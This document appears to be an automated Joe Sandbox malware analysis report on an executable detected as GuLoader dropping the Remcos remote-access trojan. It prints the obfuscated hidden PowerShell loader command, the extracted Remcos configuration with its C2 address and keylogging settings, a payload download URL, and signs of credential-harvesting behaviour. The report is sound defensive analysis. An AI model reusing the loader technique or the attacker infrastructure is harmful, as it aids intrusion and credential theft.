Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Palmebladstag.exe

Overview

General Information

Sample name:Palmebladstag.exe
Analysis ID:1439568
MD5:00ba7c7288a2f5dfa4d5830c4f4d2136
SHA1:30f5d6789f0df7e3a07157c46670406a5062a657
SHA256:6371b48a99a80e174d8f2a0a9245f060cb81a29422067453444d247c9c669e65
Tags:exeRemcosRAT
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Dosfuscation Activity
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Palmebladstag.exe (PID: 4232 cmdline: "C:\Users\user\Desktop\Palmebladstag.exe" MD5: 00BA7C7288A2F5DFA4D5830C4F4D2136)
    • powershell.exe (PID: 5916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6752 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 6820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4492 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4440 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cjmbkce" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3184 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mlstdvoafb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "172.93.222.147:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GZK076", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3385414455.0000000002DFE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.3393823082.00000000087DD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000002.00000002.3056196109.000000000BE0A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Palmebladstag.exe", ParentImage: C:\Users\user\Desktop\Palmebladstag.exe, ParentProcessId: 4232, ParentProcessName: Palmebladstag.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), ProcessId: 5916, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6820, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg", ProcessId: 4492, ProcessName: wab.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 6752, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Palmebladstag.exe", ParentImage: C:\Users\user\Desktop\Palmebladstag.exe, ParentProcessId: 4232, ParentProcessName: Palmebladstag.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), ProcessId: 5916, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 6820, TargetFilename: C:\ProgramData\remcos\logs.dat
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "172.93.222.147:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GZK076", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: Palmebladstag.exeReversingLabs: Detection: 50%
              Source: Palmebladstag.exeVirustotal: Detection: 25%Perma Link
              Source: Yara matchFile source: 00000009.00000002.3385414455.0000000002DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6820, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Palmebladstag.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,10_2_00404423
              Source: Palmebladstag.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Binary string: System.Core.pdb73-B396-481F-9042-AD358843EC24 source: powershell.exe, 00000002.00000002.3053027455.0000000006EF9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.3048447609.000000000299A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb$ source: powershell.exe, 00000002.00000002.3055743632.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.3055743632.0000000007FE9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.3053027455.0000000006E35000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.3055536411.0000000007F86000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405454
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405E7B FindFirstFileA,FindClose,0_2_00405E7B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_243910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_243910F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24396580 FindFirstFileExA,9_2_24396580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior

              Networking

              barindex
              Source: Malware configuration extractorURLs: 172.93.222.147
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: global trafficHTTP traffic detected: GET /fGuGZ105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 209.90.234.58Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: unknownTCP traffic detected without corresponding DNS query: 209.90.234.58
              Source: global trafficHTTP traffic detected: GET /fGuGZ105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 209.90.234.58Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 00000009.00000002.3405678393.0000000024360000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.3102704298.0000000003039000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.3101806409.0000000003039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2J? equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.3102704298.0000000003039000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.3101806409.0000000003039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2J? equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000009.00000002.3405899060.00000000247E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000002.3405899060.00000000247E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: wab.exe, 00000009.00000002.3393823082.0000000008778000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3405264613.0000000023A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://209.90.234.58/fGuGZ105.bin
              Source: wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://209.90.234.58/fGuGZ105.binP
              Source: bhv4AAA.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv4AAA.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000002.00000002.3055536411.0000000007F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.3053027455.0000000006EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: bhv4AAA.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv4AAA.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv4AAA.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3393823082.000000000879A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp)m
              Source: wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
              Source: wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplRx
              Source: wab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpmm
              Source: Palmebladstag.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Palmebladstag.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv4AAA.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000002.3049075645.0000000004946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.3049075645.00000000047F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.3049075645.0000000004946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000C.00000002.3090987427.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000009.00000002.3405678393.0000000024360000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000C.00000002.3090987427.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: wab.exe, 00000009.00000002.3405678393.0000000024360000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000A.00000002.3102231409.0000000002A74000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
